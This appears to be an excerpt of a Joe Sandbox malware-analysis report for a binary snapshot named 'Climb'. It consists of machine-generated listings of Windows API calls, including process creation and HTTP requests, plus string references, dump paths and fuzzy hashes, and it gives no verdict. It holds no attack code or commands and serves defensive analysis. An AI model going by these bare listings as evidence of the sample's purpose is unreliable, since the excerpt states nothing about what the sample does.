                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 0013088F
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0013089A
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 001308A5
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 001308B0
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 001308BB
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 001308C6
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 001308D1
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 001308DC
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 001308E7
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 001308F2
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 001308FD
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00130908
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00130913
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0013091E
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00130929
                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 00130939
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0013097B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215588206-0
                                                                                                                                                                          • Opcode ID: 258871b57f6d256e740e16bf8ad6b10dcb9a43a762d081cea2cdd172e2e75c04
                                                                                                                                                                          • Instruction ID: 57b989def32ce1a46d0360540609a70c409e8288d818726a9f317e895796571c
                                                                                                                                                                          • Opcode Fuzzy Hash: 258871b57f6d256e740e16bf8ad6b10dcb9a43a762d081cea2cdd172e2e75c04
                                                                                                                                                                          • Instruction Fuzzy Hash: AB4152B0D083196BDB109FBA8C89D6EBFE8FF08754B50452AE11CE7291DB789801CF91
                                                                                                                                                                          APIs
                                                                                                                                                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000D0436
                                                                                                                                                                            • Part of subcall function 000D045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0018170C,00000FA0,A9E3DD2A,?,?,?,?,000F2733,000000FF), ref: 000D048C
                                                                                                                                                                            • Part of subcall function 000D045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,000F2733,000000FF), ref: 000D0497
                                                                                                                                                                            • Part of subcall function 000D045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,000F2733,000000FF), ref: 000D04A8
                                                                                                                                                                            • Part of subcall function 000D045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 000D04BE
                                                                                                                                                                            • Part of subcall function 000D045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000D04CC
                                                                                                                                                                            • Part of subcall function 000D045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000D04DA
                                                                                                                                                                            • Part of subcall function 000D045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000D0505
                                                                                                                                                                            • Part of subcall function 000D045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000D0510
                                                                                                                                                                          • ___scrt_fastfail.LIBCMT ref: 000D0457
                                                                                                                                                                            • Part of subcall function 000D0413: __onexit.LIBCMT ref: 000D0419
                                                                                                                                                                          Strings
                                                                                                                                                                          • InitializeConditionVariable, xrefs: 000D04B8
                                                                                                                                                                          • kernel32.dll, xrefs: 000D04A3
                                                                                                                                                                          • SleepConditionVariableCS, xrefs: 000D04C4
                                                                                                                                                                          • WakeAllConditionVariable, xrefs: 000D04D2
                                                                                                                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 000D0492
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                          • API String ID: 66158676-1714406822
                                                                                                                                                                          • Opcode ID: 08c1222a4698d033cb1a4feafc2bff7431c870557bd4330ad115aafb47154a9d
                                                                                                                                                                          • Instruction ID: 162b63e1a87a44ef3b876ffc52b6a3e2c9f783d8a94d488e0cf3e53621567ab6
                                                                                                                                                                          • Opcode Fuzzy Hash: 08c1222a4698d033cb1a4feafc2bff7431c870557bd4330ad115aafb47154a9d
                                                                                                                                                                          • Instruction Fuzzy Hash: 7A21C976A44715BBD7116BE4BC06BAA37E8EB05F61F00012BFD0996790DB709C818A71
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                          • API String ID: 176396367-1603158881
                                                                                                                                                                          • Opcode ID: 7942ef9b18742cc13c8480e1ae105edda6d3abbe9525b5a6e971099fa1a0538a
                                                                                                                                                                          • Instruction ID: 504dce3bc6a97918500450e1a5166abeb93a80f8b75c912b25048e4533b992d9
                                                                                                                                                                          • Opcode Fuzzy Hash: 7942ef9b18742cc13c8480e1ae105edda6d3abbe9525b5a6e971099fa1a0538a
                                                                                                                                                                          • Instruction Fuzzy Hash: 82E1C231A046169BCB1C9FB4C8417EDBBB5BF14710F11813AE46AF7259EB30AEC587A0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharLowerBuffW.USER32(00000000,00000000,0014DCD0), ref: 00124F6C
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00124F80
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00124FDE
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00125039
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00125084
                                                                                                                                                                          • _wcslen.LIBCMT ref: 001250EC
                                                                                                                                                                            • Part of subcall function 000CFD52: _wcslen.LIBCMT ref: 000CFD5D
                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,00177C10,00000061), ref: 00125188
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                          • API String ID: 2055661098-1000479233
                                                                                                                                                                          • Opcode ID: 8de8d01a41c5d88cdc6b3fd3a56b0979641b74c85605122a021de02dc3648a66
                                                                                                                                                                          • Instruction ID: b3e3976e3ca6d4953dc280ee4ae77d3d0e643ecc5649fb9b56f11bc346af85be
                                                                                                                                                                          • Opcode Fuzzy Hash: 8de8d01a41c5d88cdc6b3fd3a56b0979641b74c85605122a021de02dc3648a66
                                                                                                                                                                          • Instruction Fuzzy Hash: 32B1E3316087129FC714DF28E990AAAB7E6EFA4710F50891DF49687292E730DC54CBA2
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013BBF8
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0013BC10
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0013BC34
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013BC60
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0013BC74
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0013BC96
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013BD92
                                                                                                                                                                            • Part of subcall function 00120F4E: GetStdHandle.KERNEL32(000000F6), ref: 00120F6D
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013BDAB
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013BDC6
                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0013BE16
                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 0013BE67
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0013BE99
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0013BEAA
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0013BEBC
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0013BECE
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0013BF43
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2178637699-0
                                                                                                                                                                          • Opcode ID: 600be92d65ec87d907d2139ab075e49014eb9fc4c9499ddcb8b2d28bc0caa0aa
                                                                                                                                                                          • Instruction ID: ddb10231be07d881527a6db40a4c0a0e3d9881d675d7e6ece5143157ebe51d0f
                                                                                                                                                                          • Opcode Fuzzy Hash: 600be92d65ec87d907d2139ab075e49014eb9fc4c9499ddcb8b2d28bc0caa0aa
                                                                                                                                                                          • Instruction Fuzzy Hash: 55F1BF35608300DFCB14EF24C891BAABBE5BF85314F14895DF9998B2A2DB31ED45CB52
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0014DCD0), ref: 00134B18
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00134B2A
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0014DCD0), ref: 00134B4F
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,0014DCD0), ref: 00134B9B
                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028,?,0014DCD0), ref: 00134C05
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000009), ref: 00134CBF
                                                                                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00134D25
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00134D4F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                          • API String ID: 354098117-199464113
                                                                                                                                                                          • Opcode ID: ccef06ed1b4308eea03cf8277fc761e4f4ccb3ebda598e911c3aa8a15d2e88cb
                                                                                                                                                                          • Instruction ID: b7c5dcac0d126dd86a529b7a5fbfc5485726e20b7aced4ae6360f2be46064d2b
                                                                                                                                                                          • Opcode Fuzzy Hash: ccef06ed1b4308eea03cf8277fc761e4f4ccb3ebda598e911c3aa8a15d2e88cb
                                                                                                                                                                          • Instruction Fuzzy Hash: C3122A75A00115EFDB14CF98C884EAEBBB9FF45314F258098E909AB261D731FD46CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemCount.USER32(001829C0), ref: 000F3F72
                                                                                                                                                                          • GetMenuItemCount.USER32(001829C0), ref: 000F4022
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 000F4066
                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 000F406F
                                                                                                                                                                          • TrackPopupMenuEx.USER32(001829C0,00000000,?,00000000,00000000,00000000), ref: 000F4082
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000F408E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 36266755-4108050209
                                                                                                                                                                          • Opcode ID: bbc9ccdaab7d0a86b692ff5e49b345d67f1a263e77a4ad0be1927922bcc5b228
                                                                                                                                                                          • Instruction ID: eeba1aeb83b71c2591953088c6037ace6cc294c5496989b0cb7c689ecf2a7fa4
                                                                                                                                                                          • Opcode Fuzzy Hash: bbc9ccdaab7d0a86b692ff5e49b345d67f1a263e77a4ad0be1927922bcc5b228
                                                                                                                                                                          • Instruction Fuzzy Hash: 2171F630644309FEEB219F28DC49FEABFA5FF05364F200216F6246A5E1CBB19954E751
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(?,?), ref: 00147823
                                                                                                                                                                            • Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A
                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00147897
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001478B9
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001478CC
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 001478ED
                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000B0000,00000000), ref: 0014791C
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00147935
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0014794E
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00147955
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0014796D
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00147985
                                                                                                                                                                            • Part of subcall function 000B2234: GetWindowLongW.USER32(?,000000EB), ref: 000B2242
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                          • String ID: 0$tooltips_class32
                                                                                                                                                                          • API String ID: 2429346358-3619404913
                                                                                                                                                                          • Opcode ID: d633480de9cfb89d77db3fa13e1b297f9b29624a6ce689966d12f684ca78065d
                                                                                                                                                                          • Instruction ID: a8d5d768b8ef26c1368b9799ff16fe543a4a786eb1d4d54fc2e112e88031ce86
                                                                                                                                                                          • Opcode Fuzzy Hash: d633480de9cfb89d77db3fa13e1b297f9b29624a6ce689966d12f684ca78065d
                                                                                                                                                                          • Instruction Fuzzy Hash: 55717974504245AFDB25CF18DC48FAABBE9FB8A318F05446DF985872B1CB70A94ACB11
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0
                                                                                                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 00149BA3
                                                                                                                                                                            • Part of subcall function 001480AE: ClientToScreen.USER32(?,?), ref: 001480D4
                                                                                                                                                                            • Part of subcall function 001480AE: GetWindowRect.USER32(?,?), ref: 0014814A
                                                                                                                                                                            • Part of subcall function 001480AE: PtInRect.USER32(?,?,?), ref: 0014815A
                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00149C0C
                                                                                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00149C17
                                                                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00149C3A
                                                                                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00149C81
                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00149C9A
                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00149CB1
                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00149CD3
                                                                                                                                                                          • DragFinish.SHELL32(?), ref: 00149CDA
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00149DCD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                          • API String ID: 221274066-3440237614
                                                                                                                                                                          • Opcode ID: 4397d3d4170c8968d9dab398ce30b90cd829fdb4878f25daa76573b6a4b029d3
                                                                                                                                                                          • Instruction ID: ec097d757353d7fb7b69651310f22f9a40f94cede64b71610818608712aaf41c
                                                                                                                                                                          • Opcode Fuzzy Hash: 4397d3d4170c8968d9dab398ce30b90cd829fdb4878f25daa76573b6a4b029d3
                                                                                                                                                                          • Instruction Fuzzy Hash: 03613671508305AFC701EF60DC85DAFBBE8FF99750F400A2EF595922A1DB70AA49CB52
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0012CEF5
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0012CF08
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0012CF1C
                                                                                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0012CF35
                                                                                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0012CF78
                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0012CF8E
                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0012CF99
                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0012CFC9
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0012D021
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0012D035
                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0012D040
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3800310941-3916222277
                                                                                                                                                                          • Opcode ID: a6f04a1d9c5619530162b5c7d680803c9fa691f4965477becf890ca9d26a87c2
                                                                                                                                                                          • Instruction ID: 1f5bd5a800bd00e3b6818aaacaeaf2c0f72bdb38112e55af4ac2a97ec34fa2f1
                                                                                                                                                                          • Opcode Fuzzy Hash: a6f04a1d9c5619530162b5c7d680803c9fa691f4965477becf890ca9d26a87c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 7651ADB5500618BFEB219FA0ED88AAB7BFCFF09744F00441AF94586660D734D955EBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,001466D6,?,?), ref: 00148FEE
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,001466D6,?,?,00000000,?), ref: 00148FFE
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,001466D6,?,?,00000000,?), ref: 00149009
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,001466D6,?,?,00000000,?), ref: 00149016
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00149024
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,001466D6,?,?,00000000,?), ref: 00149033
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0014903C
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,001466D6,?,?,00000000,?), ref: 00149043
                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001466D6,?,?,00000000,?), ref: 00149054
                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00150C04,?), ref: 0014906D
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0014907D
                                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0014909D
